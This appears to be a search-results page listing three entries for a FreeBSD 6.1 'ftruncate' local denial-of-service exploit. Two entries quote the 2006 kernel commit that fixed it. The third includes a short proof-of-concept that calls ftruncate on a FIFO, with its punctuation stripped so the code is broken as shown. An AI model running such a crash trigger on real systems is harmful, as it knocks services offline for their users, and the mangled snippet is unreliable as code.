3 matches found
FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service
/ FreeBSD cvs commit: src/sys/ufs/ufs/ufsvnops.c maxim 2006-05-31 13:15:29 UTC Log: According to POSIX, the result of ftruncate2 is unspecified for file types other than VREG, VDIR and shared memory objects. We already handle VREG, VLNK and VDIR cases. Silently ignore truncate requests for all th...
FreeBSD 6.1-RELEASE-p10 - ftruncate Local Denial of Service
FreeBSD 6.1-RELEASE-p10 - ftruncate Local Denial of Service / FreeBSD cvs commit: src/sys/ufs/ufs/ufsvnops.c maxim 2006-05-31 13:15:29 UTC Log: According to POSIX, the result of ftruncate2 is unspecified for file types other than VREG, VDIR and shared memory objects. We already handle VREG, VLNK...
FreeBSD <= 6.1-RELEASE-p10 (ftruncate) Local Denial of Service Exploit
Exploit for bsd platform in category dos / poc ====================================================================== FreeBSD include include include int main mkfifo"lol",0x1b6; int fd = open"lol",ORDWR; ftruncatefd,12345; closefd; 0day.today 2018-03-14...